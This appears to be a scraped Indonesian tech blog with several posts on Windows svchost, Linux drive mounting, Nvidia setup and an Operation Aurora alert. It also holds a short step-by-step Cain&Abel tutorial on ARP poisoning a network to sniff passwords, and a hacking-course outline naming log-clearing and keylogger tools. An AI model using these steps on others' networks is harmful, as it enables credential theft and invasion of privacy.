Dengan demikian, maka aplikasi yang Anda buat dapat lebih menghemat penggunaan memory. Keuntungan kedua, aplikasi menjadi bersifat modular. Anda dapat melakukan update aplikasi yang Anda buat tanpa harus mengupdate file EXE. Dengan demikian Anda cukup menyertakan patches kepada program Anda tanpa Anda harus menyertakan seluaruh aplikasi.
Keuntungan lain adalah ukuran file EXE menjadi lebih kecil karena beberapa kode program diletakkan pada file DLL.

WINDOWS memiliki banyak sekali service-service yang harus dipanggil. Masing-masing service tersebut tentunya harus dijalankan oleh suatu file executable. Jika seluruh service yang sedemikian banyak itu dijalankan oleh hanya sebuah file executable saja, maka tentu resiko terjadi kegagalan pemanggilan service tersebut akan sangat tinggi. Untuk mengantisipasi hal itu, maka service-service tersebut dikelompok-kelompokkan sesuai dengan fungsinya. Tiap file SVCHOST.EXE dipanggil untuk menjalankan kelompok service yang berbeda. Misalnya SVCHOST.EXE yang pertama menjalankan group service untuk Audio, SVCHOST.EXE kedua menjalankan service-service Firewall, dan lain sebagainya. Karena pemisahan-pemisahan inilah banyak terdapat proses dengan nama SVCHOST.EXE.

Ketik perintah berikut pada COMMANDPROMP:

TASKLIST /SVC
TASKLIST /FI “IMAGENAME eq svchost.exe” /SVC

Dapat terlihat, bahwa “svchost.exe” menjalankan service-service tertentu yang berbeda.

Sniffing Password with cain&abel


Sniffing  merupakan kegiatan pencurian atau penyadapan data. Meskipun data tidak di curi secara fisik (dalam artian menjadi hilang), sniffing sangat berbahaya karena dapat digunakan untuk menyadap password dan informasi yang sensitif. Ini merupakan serangan terhadap aspek privasi.

Membicarakan tentang sniffing adalah topik yang mudah sekaligus topik yang sangat rumit. Membicarakan secara komplit tentang masalah sniffing membutuhkan minimal 1 buku tersendiri (so pasti tebal guys.. ^_^). Karena kita harus membicarakan tentang topik tingkat rendah, yaitu bagaimana menganalisa paket-paket hasil tangkapan tersebut.

Dengan menganalisa paket-paket yang melalui jaringan, banyak hal yang bisa kamu ketahui. seperti; komputer mana yang sedang melakukan aktifitas hacking, komputer mana yang sedang menjalankan program sniffer, komputer mana yang terkena virus dan lain sebagainya.

Tidak heran, aktifitas sniffing ini tidak hanya dilakukan untuk tujuan hacking, namun juga digunakan oleh program-program yang membutuhkan analisa paket seperti Network IDS. Tidak heran, sniffer ini juga dikenal dengan nama “Protocol analyzer“.

Ada banyak sekali tool-tool sniffer yang bertebaran di internet. Contohnya, WireShark, Snort, tcpdump, Windump, etc.. Tapi, disini saya menggunakan tool bernama “Cain&abel”. Ini adalah tool terbaik menurut pandangan saya. Kamu bisa mendownload nya di sini

Ok, saya tidak akan panjang lebar lagi. Pertama, kamu harus memilih ethernetcard yang akan digunakan untuk aktifitas sniffing. selanjutnya.. perhatikan gambar!..

selanjutnya, aktifkan sniffer dengan menekan tombol sniffer seperti pada gambar di bawah.

Masuk ke tab ARP, klik tanda +, pilih getway di tabel kiri, dan pilih target di sebelah kanan. lalu OK!

Ok, sekarang kita mulai sniffing.. Aktifkan tombol ARP Poisoning seperti pada gambar di bawah.

Masuk ke tab “password”, and…

Operation Aurora (Virus Alert)


The tightly coordinated attack code-named Operation Aurora, exposes a zero-day vulnerability in Microsoft IE (CVE-2010-0249) to install espionage Trojans on networks of large corporations and steal information.
The sophisticated attack uses multiple malware components with highly obfuscated code, designed to bypass Intrusion Protection Systems (IPS) and Intrusion Detection Systems (IDS). The Operation Aurora attacks are claimed to have changed the cyber threat landscape, setting new standards for malware authors.
The vulnerability affects systems running on Microsoft IE 6 on Windows 2000 and IE 6, 7, and 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
What is a zero-day vulnerability?
A zero day vulnerability is one that takes advantage of security holes for which a solution is not yet available. This could be any kind of malware that loads itself onto your computer through hidden code on a Web site. Typically, cybercriminals will use tricks like spam, phishing, or fake websites that show up on search results to lure people to an infected site.
ZoneAlarm browser virtualization technology can shield you from such surprise attacks. It automatically catches and neutralizes stealth Web browser exploits.
How Can I Defend Myself?
  1. Stay on top of security patches, especially for browsers. Vulnerabilities happen all the time. Make sure the operating system and software/applications are updated with the latest patches. Depending on the operating system, critical patches are usually pushed out to the computer automatically or users will get a notice on your computer that updates are available. The messages should not be ignored. Updates should be downloaded as soon as possible.
  2. Have a complete security solution. By definition, zero day browser threats are unknown and unrecognizable and therefore antivirus and antispyware scans cannot yet detect them. Computer users need a complete security solution, which can detect new exploits without signatures that target vulnerabilities.
These guidelines are always smart, but absolutely essential if you do not have a complete security solution:
  1. Don’t download from sites that you don’t trust
  2. Don’t enter confidential information into sites you are not familiar with
  3. Don’t shop at sites you don’t know
  4. Update your operating system regularly
  5. Always run the latest version of your browser software, checking regularly for updates
  6. Never follow a link from an e-mail that asks you to enter private information. Only malicious sites designed to look like real sites will ask for this. Reputable sites will never ask you to do this!
  7. Never open an e-mail or instant message attachment unless you know and trust the sender and can verify the attachment was intentionally sent.

Hacker’s Modules


The Modules to be a Hacker

## Module 1 : Ethics and Legality

1. What is an Exploit?

Merupakan suatu ungkapan untuk sebuah celah keamanan dalam software yang berjalan dalam sebuah komputer. Dengan Exploit inilah seorang hacker/cracker bisa masuk ke sebuah sistem komputer yang menggunakan software tersebut dan para hacker/cracker akan menggunakan untuk kerperluan perusahaan yang membuat software tersebut atau untuk keuntungannya sendiri(para cracker) atau bisa saja disebarkan dalam forum komunikasi mereka.

Kelemahan yang ada dan telah diketahui oleh pihak pembuat software akan diperbaiki, supaya software tersebut aman digunakan oleh konsumen.

2. The security functionality triangle

3. The attecker’s process

4. Passive reconnaissance

5. Active reconnaissance

6. Type of attacks

7. Catagories of exploits

8. Goal attackers try to achieve

9. Ethichal hackers and crackers – who are there ?

10. Self proclaimed ethical hacking

11. Hacking for a cause (Hacktivism)

12. Skills required for ethical hacking

13. Categories of Ethical Hackers

14. What do Ethical Hackers do?

15. Security evaluation plan

16. Testing types

17. Ethical Hacking Report

18. Cyber Security Enhancement Act of 2002

19. Computer Crimes

20. Overview of Us Federal Laws

21. Section 1029

22. Section 1030

## Module 2 : Footprinting ##

1. What is Footprinting

2. Steps for gathering information

3. Whois

4. http://tocows.com

5. Hacking Tools: Sam Spade

6. Analizing Whois output

7. NSLookup

8. Finding the address range of the network

9. ARIN

10. Traceroute

11. Hacking Tool: NeoTrace

12. Visual Route

13. visual Lookout

14. Hacking Tool: Smart Whois

15. Hacking Tool: eMailTracing Pro

16. Hacking Tool: MailTracing.Com

## Module 3 : Scanning

1. Determining if the system is alive?

2. Active stack fingerprinting

3. Passive stack fingerprinting

4. Hacking Tool: Pinger

5. Hacking Tool: WS_Ping_Pro

6. Hacking Tool: Netscan Tools Pro 2000

7. Hacking Tool: Hping2

8. Hacking Tool: icmpenum

9. Detecting Ping sweeps

10. ICMP Queries

11. Hacking Tool: netctraft.com

12. Port Scanning

13. TCPs 3-way handshake

14. TCP Scan types

15. Hacking Tool: IPEye

16. Hacking Tool: IPSECSCAN

17. Hacking Tool: nmap

18. Port Scan countermeasures

19. Hacking Tool: HTTrack Web Copier

20. Network Management Tools

21. SolarWinds Toolset

22. NeoWatch

23. War Dialing

24. Hacking Tool: THC-Scan

25. Hacking Tool: PhoneSweep war Dialer

26. Hacking Tool: Queso

27. Hacking Tool: Cheops

28. Proxy Server

29. Hacking Tool: SocksChain

30. Surf the web anymously

31. TcP/IP through HTTP Tunneling

32. Hacking Tool: HTTPort

## Module 4 : Enimeration

1. What is Enumeration

2. NetBios Null Sessions

3. Null Session Countermeasures

4. NetBIOS Enumeration

5. Hacking Tool: DumpSec

6. Hacking Tool: NAT

7. SNMP Enumertion

8. SNMPUtil

9. Hacking Tool: IP Network Browser

10. SNMP Enumeration Countermeasures

11. Windows 2000 DNS Zone transfer

12. Identifying Win2000 Accounts

13. Hacking Tool: User2SID

14. Hacking Tool: SID2User

15. Hacking Tool: Enum

16. Hacking Tool: UserInfo

17. Hacking Tool: GetAcct

18. Active Directory Enumeration

## Module 5 : System Hacking

1. Administrator Password Guessing

2. Performing Automated Password Guessing

3. Legion

4. NTInfoScan

5. Defending Against Password Guessing

6. Monitoring Even Viewer Logs

7. VisualLast

8. Eavesdroppin on Network Password Exchanged

9. Hacking Tool: LophtCrack

10. Hacking Tool: KerbCrack

11. Privilege Escalation

12. Hacking Tool: GetAdmin

13. Hacking Tool: Hk

14. Manual Password Cracking Alogarithm

15. Password Types

16. TYpe of Password Attacks

17. Distributed brute Force Attack

18. Hybrid Attack

19. Cracking Windows 2000 Passwords

20. Retrieving the SAM file

21. Redirecting SMB Logon to Attacker

22. SMB Redirection

23. Hacking Tool: SMBRelay2

24. SMBRelay Man-in-the-Middle (MITM)

25. SMBRelay MITM Countermeasures

26. Hacking Tool: SMBGrinder

27. Hacking Tool: SMBDie

28. Hacking Tool: NBTDeputy

29. NetBIOS DoS Attack

30. Hacking Tool: nbname

31. Hacking Tool: John the Ripper

32. LanManager Hash

33. Password Cracking Countermeasures

34. Keystroke Logger

35. Hacking Tool: Spector

36. AntiSpector

37. Hacking Tool:eblaster

38. Hacking Tool: SpyAnywhere

39. Hacking Tool: IKS Software Logger

40. Hacking tool: Hardware Key Logger

41. Hacking Tool: Rootkit

42. Planting rooting on Windows 2000 Machine

43. _rootkit_embedded TCP/IP Stack

44, Rootkit Countermeasures

45. MD5 Checksum Utility

46. Tripware

47. Covering Tracks

48. Disabling Auditing

49. Auditpol

59. Clearing the Even Log

60. Hacking Tool: Elslave

61. Hacking Tool: Winzapper

62, Hacking Tool: Evidence Eliminator

63. Hidding Files

64. NTFS File Streaming

65, Hacking Tool: makestrm

66. NTFS Streams Countermeasures

67. LNS

68. Steganography

69. Hacking Tool: ImagiHide

70. Hacking Tool: MP3Stego

71. Hacking Tool: Snow

72. Hacking Tool: Camera/Shy

73. Steganography Detection

74. StegDetect

75. Encrypted File System

76. Hacking Tool: dskprobe

77. Hacking Tool: EFSView

78. Buffer Overflow

79. Creating Buffer Overlow Exploit

80. Outlook Buffer Overflow

81. Hacking Tool: Outoutlook

Antivirus 2009


Ditahun 2009 ini, entah sudah berapa juta virus, worm, trojan, etc.. yang sudah diciptakan.. di perkembangan yang cukup cepat ini, mampukah sebuah antivirus dengan rating tertinggi di internet meng-handle semua malcode terbaru yang tercipta tiap jamnya… jawabannya adalah tidak mungkin.. lantas, apa antivirus yang mampu menghandle perkembangan malcode yang begitu cepatnya itu??? jawabannya adalah Brain User..!!!! hanya kita sendiri lah yang mampu mencegah serangan-serangan dari malcode tersebut. Caranya?? ya, dengan menghilangkan kecerobohan kita saat menggunakan sistem.. kenali sistem dan dokument yang kamu punya.. sehingga teknik “Social Engenering” digunakan oleh 90% malcode, dapat menjadi tidak berguna.. mungkin cara ini tidak semudah yang tertulis.. tapi inilah cata yang paling ampuh untuk mengalahkan serangan malcode2 yang sekarang sedang menunggu kamu mengaksesnya.. THINK, WHAT I THINK.. SEE, WHAT I SEE, FEEL, WHAT I FEEL..

Mounting Drives di Linux


Dulu, gue punya masalah waktu pertama gue make linux. Ya.. ini nih.. gue sempet dibikin pusing waktu mau ngakses file-file gue di harddisk yang make file sistem NTFS or FAT. Padahal dokumen-dokumen gue simpen disitu. Linux memang gak manjain usernya seperti kalo lo make Windows XP. Biasalah.. masalah security.. he. Ya dah, gak usah banyak-banyak basa-basinya..

  1. Buka terminal, masuk sebagai SuperUser. Caranya.. ketik “su” trus masukkin passwrd nya deh..
  2. ketik “mkdir /media/win_c” ini adalah fungsi untuk membuat folder “win_c” di dalam folder “media”. Ini dilakukan karena untuk me-mount sebuah device, kita harus menyediakan tempat bagi devices itu terlebih dahulu. Unix ya…. : p
  3. <untuk NTFS> ketik “mount -t ntfs /dev/<source> /media/<distnation>” contohnya: “mount -t ntfs /dev/hda1 /media/win_c”. Pada source, bisa saja berbeda.. misalnya hda3, hda5, hdb1, hdb5, etc… tergantung bagaimana kamu membuat partiisi sewaktu instalasi. kamu bisa melihat nya dengan tool “Partiition Editor” cara lainnya gue lupa… hehe..
  4. <untuk FAT> ketik “mount -t vfat /dev/<source> /media/<dist>”. Kalo kamu punya lebih dari satu partiisi yang mau di mount. ya, berarti kamu juga harus nyedian folder di /media/… lihat caranya di no2.
  5. Nah, sekarang coba gyh di cek di /media/… udah bisa di akses belum..

Setting Nvidia di Ubuntu


Sebenernya, sih gampang kok… hehe

  1. Buka console\terminal
  2. Masuk sebagai super user. ketik “su” dan masukkan passwordnya
  3. ketikkan “cp /etc/X11/xorg.conf xorg.conf.bak” (perintah tersebut adalah perintah mengkopi file “xorg.conf” menjadi “xorg.conf.bak”. Atau istilah lainnya ya BACKUP lah. hehe..
  4. Sekarang, instal drivernya.. cari file “nvidia-glx” kamu bisa akses lewat Synaptic Package Manager atau ketik “apt-get install nvidia-glx” di terminal. Jangan lupa depends nya ya.. (kalo ada sih)
  5. Masih di terminal dengan akses root tadi, ketik “vi xorg.conf”. Sekarang skrol ke bawah… disitu ada “nv”. tekan “i” (insert), Ganti menjadi “nvidia”, tekan ESC. lalu ketik “:wq”.

Restar XServer dengan menekan tombol CTRL+ALT+BACKSPACE..

Selesai deh… gak rumit kan??? sekarang kamu bisa mainin game-game 3d di Ubuntu kamu.

Linux or Microsoft??


Huh.. lagi-lagi gw harus denger perdebatan antara LINUX ama WINDOWS.. satu sisi si pengguna linux trus ngehajar si pengguna WINDOWS dengan masalah security nya… si Windows pun gak mau kalah.. dia ngehajar LINUX dari segi user friendly nya…

hmmm… kalo dilihat lihat sih.. emang iya sih.. gak ada yang sempurna… kedua operating sistem ini memang masing-masing punya kekurangan… Microsoft yang terlalu berfokus ke User Friendly nya.. sampai-sampai harus membuat user tersungkur dibawah meja komputernya gara-gara seluruh data-data dihardisknya di infeksi dan di hapus oleh seekor WORM lokal yang nggak ke diteksi oleh antivirus yang ia install.. itu cuma sedikit kelemahan dari sistem keamanan di produk microsoft.  Berbagai exploitasi lain pun bisa dilakukan pada sistem ini. Gw gak akan ngebahas exploitasi apa aja yang bisa di lakukan pada sistem ini.. (kan udah banyak di internet…he).

Ups.. kok videonya gak bisa disetel sih??? loh.. sekarang bisa disetel.. tapi kok hasil rendering gak bagus sih.. ??? hehe.. ya kira-kira gitu dah kalo lo pake LINUX… lo juga mungkin bisa dibikin pusing pas mau nginstal driver buat salah satu hardware yang lo punya… harus browsing ke sana-sini.. ampek pegel tuh tangan loe ngetik kemungkinan2 url di firefox loe.. ha ha ha.. BUT,,, gak semua distro linux yang punya masalah dependensi kayak gitu.. jadi pinter-pinter aja loe milih distro linux yang mau lo pake… he..

Nah, sekarang… tinggal pilih aja sistem yang mau lo instal di kompie elo… Linux or Microsoft??? hayooo….

kalo gue sih selalu make 2 sistem di kompie jadul kesayangan gue.. yang satu sistem kesayangan gw… UBUNTU… yang satu lagi.. ya Mikocok..eh salah.. Microsoft… ha ha ha .. soal nya udah lama gw nyari DotA ama Counter-Strike buat Pinguin gw tercinta tapi gak ada… yaaa… : (